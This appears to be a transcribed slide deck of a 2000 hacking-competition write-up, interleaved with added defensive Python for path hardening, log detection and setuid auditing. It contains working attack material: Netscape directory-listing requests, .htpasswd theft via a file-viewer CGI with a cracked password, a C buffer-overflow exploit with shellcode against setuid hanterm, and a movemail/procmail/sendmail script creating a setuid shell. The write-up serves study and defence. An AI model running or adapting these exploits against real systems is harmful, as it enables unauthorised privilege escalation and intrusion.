Published by Roderick Fox. Modified over 9 years ago.
1st OlymFair Workshop
Hacking technique
Taeho Oh
ohhara@4dl.com
ohhara@postech.edu
http://postech.edu/~ohhara
Contents
How to pass level 1
How to pass level 2
Why did many hackers spend so much time on level 2?
About level 3
Conclusion
How to pass level 1 (1)
What to do?
–Execute /cgi-bin/data/idaccess.cgi and obtain the way to reach level 2
How to pass level 1 (2)
Level 1 servers
–203.227.243.161
–203.227.243.162
–203.227.243.163
How to pass level 1 (3)
203.227.243.161
–OS: Solaris 8
–Open TCP ports: 80, 8080
How to pass level 1 (4)
203.227.243.162
–OS: HP-UX 11.0
–Open TCP ports: 22, 80, 8080
How to pass level 1 (5)
203.227.243.163
–OS: MS Windows 2000
–Open TCP ports: 7, 9, 13, 17, 19, 25, 80, 135, 139, 443, 1025, 1026, 1032, 1723, 3389
How to pass level 1 (6)
Attack 203.227.243.161
–80: Apache Web Server
–8080: Netscape Enterprise Server
The web servers on 80 and 8080 share the same httpd home directory
Netscape Enterprise Server has a security bug
How to pass level 1 (7)
Netscape Enterprise Server security bug
–I could see the files in a specific directory with a request like this one: http://203.227.243.161/?wp-cs-dump
–You can also use ?wp-ver-info, ?wp-html-rend, ?wp-usr-prop, ?wp-ver-diff, ?wp-verify-link, ?wp-start-ver, ?wp-stop-ver, and ?wp-uncheckout
–I could browse the directories and check whether files exist
How to pass level 1 (8)
The file list
/
+-----cgi-bin/
|     +-----data/
|     +-----hackme/
|           +-----a
|           +-----a.c
|           +-----show_file.html
|           +-----showfile.cgi
+-----data/
+-----index.html
Can't access this directory
How to pass level 1 (9)
Read the .htaccess file with showfile.cgi
–http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess
Read the .htpasswd file named in .htaccess with showfile.cgi
–http://203.227.243.161/cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd
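The path handling behind a file viewer like showfile.cgi, as an added example that is not part of the original slides: a resolver that glues NAME onto the server root, beside one that confines NAME to a public directory and refuses dotfiles. The directory tree, file contents and function names are constructed for the demonstration.

```python
import os
import shutil
import tempfile
from typing import Optional

def resolve_vulnerable(server_root: str, name: str) -> str:
    """Models showfile.cgi: NAME is glued onto the server root unchecked, so
    NAME=/cgi-bin/data/.htaccess (or ../ sequences) reads any file under it."""
    return os.path.normpath(server_root + "/" + name)

def resolve_hardened(public_dir: str, name: str) -> Optional[str]:
    """Confine NAME to public_dir: canonicalise, check containment, and refuse
    dotfile components so .htaccess and .htpasswd are never served."""
    if "\0" in name or name.startswith(("/", "\\")):
        return None
    base = os.path.realpath(public_dir)
    target = os.path.realpath(os.path.join(base, name))
    if os.path.commonpath([base, target]) != base:
        return None                      # escaped the public directory
    rel = os.path.relpath(target, base)
    if any(part.startswith(".") for part in rel.split(os.sep)):
        return None                      # dotfile (or the directory itself)
    return target

def demo() -> dict:
    """Constructed tree mirroring the slide: cgi-bin/data/.htaccess is private,
    cgi-bin/hackme/ is the directory the file viewer is meant to serve."""
    root = tempfile.mkdtemp()
    try:
        os.makedirs(os.path.join(root, "cgi-bin", "data"))
        os.makedirs(os.path.join(root, "cgi-bin", "hackme"))
        with open(os.path.join(root, "cgi-bin", "data", ".htaccess"), "w") as f:
            f.write("AuthUserFile /cgi-bin/data/.htpasswd\n")   # constructed
        with open(os.path.join(root, "cgi-bin", "hackme", "show_file.html"), "w") as f:
            f.write("<html></html>\n")
        public = os.path.join(root, "cgi-bin", "hackme")
        req = "/cgi-bin/data/.htaccess"   # the NAME value from the slide
        with open(resolve_vulnerable(root, req)) as f:
            leaked = f.read()
        return {
            "vulnerable_leaks": leaked.startswith("AuthUserFile"),
            "hardened_absolute": resolve_hardened(public, req),
            "hardened_traversal": resolve_hardened(public, "../data/.htpasswd"),
            "hardened_normal": resolve_hardened(public, "show_file.html") is not None,
        }
    finally:
        shutil.rmtree(root)
```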
How to pass level 1 (10)
I could crack the encrypted password from .htpasswd with Crack
–id:password = admin:banana
–I could access the /cgi-bin/data directory with this id and password
How to pass level 1 (11)
I could get the way to go to level 2
–http://203.227.243.161/data/idaccess.html
This page is the form that executes http://203.227.243.161/cgi-bin/data/idaccess.cgi
–My serial number: KOR000321-961829513
–My password: oD8YEuqYySWogKSQQsOY00zoAjUkxtv7
How to pass level 1 (12)
Netscape Enterprise Server directory indexing vulnerability
–See http://www.securityfocus.com/vdb/bottom.html?vid=1063
How to pass level 1 (13)
Netscape Enterprise Server directory indexing vulnerability patch information
The Directory Indexing feature can be turned off via the Administration Interface. Selecting Content Management -> Document Preferences and changing Directory Indexing to "none" will disable this feature. Also, manually editing the file obj.conf will do the same. Conduct a search for the following:
Service method="(GET|HEAD)" type="magnus-internal/directory" fn="index-common"
and replace fn="index-common" with fn="send-error".
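An added detection example, not from the original slides: classifying web access-log lines for the ?wp-* commands listed earlier and for a file-viewer parameter that names a .ht* file or climbs with ../. The log lines are constructed in common log format; the CGI path and NAME values follow the slides, and the function names are the example's own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Netscape Enterprise Server commands from the slide, matched as query keys.
WP_COMMANDS = {"wp-cs-dump", "wp-ver-info", "wp-html-rend", "wp-usr-prop",
               "wp-ver-diff", "wp-verify-link", "wp-start-ver", "wp-stop-ver",
               "wp-uncheckout"}
# Common log format: host ident user [time] "method target proto" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

def classify(line):
    """Return (source, status, findings) for a suspicious request, else None."""
    m = CLF.match(line)
    if not m:
        return None
    src, _method, target, status = m.groups()
    query = unquote(urlsplit(target).query)
    findings = []
    # "?wp-cs-dump" has no '=' and parse_qs would drop it, so test raw keys.
    for token in query.split("&"):
        key = token.split("=", 1)[0].lower()
        if key in WP_COMMANDS:
            findings.append(("nes-wp-command", key))
    # Any parameter whose value names a .ht* file or climbs directories.
    for values in parse_qs(query).values():
        for v in values:
            leaf = v.replace("\\", "/").rstrip("/").rsplit("/", 1)[-1]
            if leaf.startswith(".ht") or "../" in v:
                findings.append(("dotfile-or-traversal", v))
    return (src, status, findings) if findings else None

def scan(lines):
    return [r for r in map(classify, lines) if r is not None]

# Constructed log lines modelled on the requests described in the slides.
SAMPLE_LOG = [
    '203.0.113.5 - - [30/Jun/2000:13:40:01 +0900] "GET /?wp-cs-dump HTTP/1.0" 200 1532',
    '203.0.113.5 - - [30/Jun/2000:13:41:17 +0900] "GET /cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htaccess HTTP/1.0" 200 88',
    '203.0.113.5 - - [30/Jun/2000:13:41:30 +0900] "GET /cgi-bin/hackme/showfile.cgi?NAME=/cgi-bin/data/.htpasswd HTTP/1.0" 200 34',
    '198.51.100.9 - - [30/Jun/2000:13:42:00 +0900] "GET /index.html HTTP/1.0" 200 512',
]
```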
How to pass level 2 (1)
What to do?
–Execute /home/forbidden/pass.cgi
The owner of this executable file is root
The group of this executable file is wizard
The permission is 0510
The wizard gid is needed to execute /home/forbidden/pass.cgi
How to pass level 2 (2)
Level 2 server
–203.227.243.164
203.227.243.164
–OS: Linux
–Open TCP ports: 23, 81
How to pass level 2 (3)
Wizard setuid or setgid files
-r-sr-xr-x 1 wizard wizard 26309 Jan 4 09:40 /sbin/pwdb_chkpwd
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rwsr-xr-x 1 wizard wizard 10708 Apr 20 1999 /sbin/cardctl
-rws--x--x 1 wizard wizard 6148 May 15 1999 /usr/X11R6/bin/Xwrapper
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
-rwsr-xr-x 1 wizard wizard 3208 Mar 23 1999 /usr/bin/disable-paste
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-x--- 1 wizard wizard 40060 Aug 31 1999 /usr/bin/startinnfeed
-r-sr-sr-x 1 wizard wizard 15816 Jan 7 07:41 /usr/bin/lpq
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-r-sr-sr-x 1 wizard wizard 16248 Jan 7 07:41 /usr/bin/lprm
How to pass level 2 (4)
Wizard setuid or setgid files (Cont.)
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/suidperl
-rws--x--x 2 wizard wizard 517916 Apr 7 1999 /usr/bin/sperl5.00503
-rwsr-sr-x 1 wizard wizard 64468 Apr 7 1999 /usr/bin/procmail
-rwsr-xr-x 1 wizard wizard 14036 Apr 16 1999 /usr/bin/rcp
-rwsr-xr-x 1 wizard wizard 10516 Apr 16 1999 /usr/bin/rlogin
-rwsr-xr-x 1 wizard wizard 7780 Apr 16 1999 /usr/bin/rsh
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
-rwsr-xr-x 1 wizard wizard 16488 Mar 23 1999 /usr/sbin/traceroute
-rwsr-xr-x 1 wizard wizard 18040 Jan 8 05:24 /usr/sbin/userhelper
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
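An added example, not part of the original slides: a parser for the ls -l listing above that reports which world-executable set-id programs hand any local user the wizard uid or gid, which is the inventory a defender reviews before trusting a group like wizard. The listing excerpt is copied from the slides; the function names are the example's own.

```python
import re

# One "ls -l" entry: mode, links, owner, group, size, month, day, year-or-time, path
LS_LINE = re.compile(
    r"^([-dlrwxsStT]{10})\s+\d+\s+(\S+)\s+(\S+)\s+\d+\s+\S+\s+\d+\s+\S+\s+(\S+)$")

def parse_ls_line(line):
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    mode, owner, group, path = m.groups()
    return {"path": path, "owner": owner, "group": group,
            "setuid": mode[3] in "sS",      # 'S' = set-id bit without exec bit
            "setgid": mode[6] in "sS",
            "world_exec": mode[9] in "xt"}  # anyone may run it

def privilege_grantors(listing, group):
    """Paths any user can run that yield `group`'s uid or gid (the gid is the
    level 2 goal), with what each grants; group-only or unexecutable entries
    are dropped."""
    grants = {}
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if not e or not e["world_exec"]:
            continue
        gain = []
        if e["setuid"] and e["owner"] == group:
            gain.append("uid")
        if e["setgid"] and e["group"] == group:
            gain.append("gid")
        if gain:
            grants[e["path"]] = "+".join(gain)
    return grants

# Excerpt of the listing from the slides (copied, not constructed).
LISTING = """\
-rwsr-sr-x 1 wizard wizard 47692 Mar 29 1999 /sbin/dump
-rws--x--x 1 wizard wizard 158180 May 14 1999 /usr/X11R6/bin/hanterm
-rwsr-xr-x 1 wizard wizard 33120 Mar 22 1999 /usr/bin/at
-r-sr-x--- 1 wizard wizard 42652 Aug 31 1999 /usr/bin/inndstart
-r-sr-sr-x 1 wizard wizard 15608 Jan 7 07:41 /usr/bin/lpr
-rwxr-sr-x 1 wizard wizard 17832 May 14 1999 /usr/lib/emacs/20.3/i386-redhat-linux/movemail
-rwsr-sr-x 1 wizard wizard 299364 Apr 20 1999 /usr/sbin/sendmail
-rwxr-sr-x 1 wizard wizard 3860 Apr 20 1999 /sbin/netreport
"""
```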
How to pass level 2 (5)
Attack process
Get level2 shell → Get wizard euid → Get wizard uid → Create wizard uid, gid file → Get wizard gid → Execute pass.cgi
How to pass level 2 (6)
level2 shell → wizard euid
–Exploit hanterm bug
[I have no name!@level2... ]$ hanterm -hfn `perl -e "print 'A'x240"`
can't load english font AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[I have no name!@level2... ]$ hanterm -hfn `perl -e "print 'A'x250"`
Segmentation fault
[I have no name!@level2... ]$
How to pass level 2 (7)
level2 shell → wizard euid (Cont.)
–This is a classical buffer overflow bug
–I could get a wizard euid shell with buffer size 260 and offset -450
How to pass level 2 (8) to (13)
Exploit code
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define OFFSET -450
#define RET_POSITION 260
#define RANGE 20
#define NOP 0x90

char shellcode[1024]=
"\xeb\x1f"                 /* jmp 0x1f */
"\x5e"                     /* popl %esi */
"\x89\x76\x08"             /* movl %esi,0x8(%esi) */
"\x31\xc0"                 /* xorl %eax,%eax */
"\x88\x46\x07"             /* movb %eax,0x7(%esi) */
"\x89\x46\x0c"             /* movl %eax,0xc(%esi) */
"\xb0\x0b"                 /* movb $0xb,%al */
"\x89\xf3"                 /* movl %esi,%ebx */
"\x8d\x4e\x08"             /* leal 0x8(%esi),%ecx */
"\x8d\x56\x0c"             /* leal 0xc(%esi),%edx */
"\xcd\x80"                 /* int $0x80 */
"\x31\xdb"                 /* xorl %ebx,%ebx */
"\x89\xd8"                 /* movl %ebx,%eax */
"\x40"                     /* inc %eax */
"\xcd\x80"                 /* int $0x80 */
"\xe8\xdc\xff\xff\xff"     /* call -0x24 */
"/bin/sh";                 /* .string \"/bin/sh\" */

unsigned long get_sp(void)
{
  __asm__("movl %esp,%eax");
}

void main(int argc,char **argv)
{
  char buff[RET_POSITION+RANGE+1],*ptr;
  long *addr_ptr,addr;
  unsigned long sp;
  int offset=OFFSET,bsize=RET_POSITION+RANGE+1;
  int i;

  if(argc>1)
    offset=atoi(argv[1]);

  sp=get_sp();
  addr=sp-offset;

  /* fill the whole buffer with the guessed return address */
  ptr=buff;
  addr_ptr=(long*)ptr;
  for(i=0;i<bsize;i+=4)
    *(addr_ptr++)=addr;

  /* NOP sled in front of the shellcode */
  for(i=0;i<bsize-RANGE*2-strlen(shellcode);i++)
    buff[i]=NOP;

  ptr=buff+bsize-RANGE*2-strlen(shellcode)-1;
  for(i=0;i<strlen(shellcode);i++)
    *(ptr++)=shellcode[i];

  buff[bsize-1]='\0';

  execl("/usr/X11R6/bin/hanterm","hanterm","-hfn",buff,0);
}
How to pass level 2 (14)
wizard euid → wizard uid
[I have no name!@level2... ]$ cat > a.c
main(){
  setreuid(501,501);
  execl("/bin/sh","sh",0);
}
[I have no name!@level2... ]$ gcc a.c ; ./a.out
[wizard@level2... ]$ whoami
wizard
[wizard@level2... ]$
How to pass level 2 (15)
wizard uid → create wizard uid, gid file
–movemail is a wizard setgid program
The output file written by movemail has the wizard gid
[wizard@level2... ]$ echo haha > test1
[wizard@level2... ]$ movemail test1 test2
[wizard@level2... ]$ ls -l test1 test2
-rw-r--r-- 1 wizard hackers 0 Jul 10 02:03 test1
-rw-r--r-- 1 wizard wizard 5 Jul 10 02:03 test2
[wizard@level2... ]$ cat test2
haha
How to pass level 2 (16)
wizard uid, gid file → wizard gid
–procmail can execute an arbitrary shell command with the wizard uid and gid when the user can create a file owned by the wizard uid and gid
How to pass level 2 (17) to (19)
Exploit code
#!/bin/sh
PATH=${PATH}:/usr/lib/emacs/20.3/i386-redhat-linux
export PATH
cat > shh.c << EOF
main(){
  setreuid(501,501);
  setregid(501,501);
  execl("/bin/sh","sh",0);
}
EOF
gcc shh.c -o shh
movemail shh shh2
cat > proc << EOF
:0
*
| /bin/chmod 6777 /tmp/shh2
EOF
movemail proc /home/wizard/.procmailrc
echo haha | /usr/sbin/sendmail -OQueueDirectory=/tmp wizard
sleep 2
rm -f /home/wizard/.procmailrc
rm -f ./proc
rm -f ./exp
rm -f ./shh.c
rm -f ./shh
echo "rm -f ./shh2" | ./shh2
How to pass level 2 (20)
wizard gid → execute pass.cgi
Congratulation!! You have passed Level 2.
Your ID : KOR000321-961829513
Initial Pass Time Stamp : 2000-06-30 13:59:30GMT+9
IP for Level 3 is 203.227.243.173
It is protected by ip filtering.
Please attack and acquire adminstrator's privilege. And then change the index.html under level3 server.
Level 3 Login ID : level3
Level 4 Login Passwd : olymfair3
Why did many hackers spend so much time on level 2? (1)
Almost all hackers tried to find a security bug
–However, level 2 can be cleared not with a bug but with a feature (except for the hanterm bug)
Why did many hackers spend so much time on level 2? (2)
/sbin/dump has a buffer overflow bug, and no exploit has been released
–Many hackers tried to exploit this program. However, exploitation is impossible because the main function does not return but calls exit
Why did many hackers spend so much time on level 2? (3)
The /usr/bin/lprm exploit code generates a segmentation fault message
–The segmentation fault message is not generated by /usr/bin/lprm. It is generated by the /usr/bin/lprm exploit code itself. It's a bug in the exploit code.
About level 3
I spent so much time that I had no time to attack level 3
I tried to scan the level 3 server
–However, I couldn't find an open TCP port
–I didn't try to attack level 3 after that
It seemed it would take much time
Conclusion
It was an interesting hacking competition